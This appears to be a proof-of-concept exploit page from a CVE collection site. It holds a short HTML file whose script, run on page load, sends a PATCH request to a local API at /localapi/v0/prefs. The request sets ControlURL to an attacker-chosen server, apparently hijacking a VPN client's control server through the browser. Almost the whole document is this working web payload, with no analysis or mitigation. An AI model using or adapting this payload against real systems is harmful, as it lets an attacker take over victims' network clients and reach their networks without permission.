4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / 3.html HTML
<h1>We have arrived localhost!!!</h1>

<script>
  (async()=>{
      await fetch("/localapi/v0/prefs", {
        method: "PATCH",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          "ControlURL": "https://yourheadscale.server",
          "ControlURLSet": true
        })
      })
  })()
</script>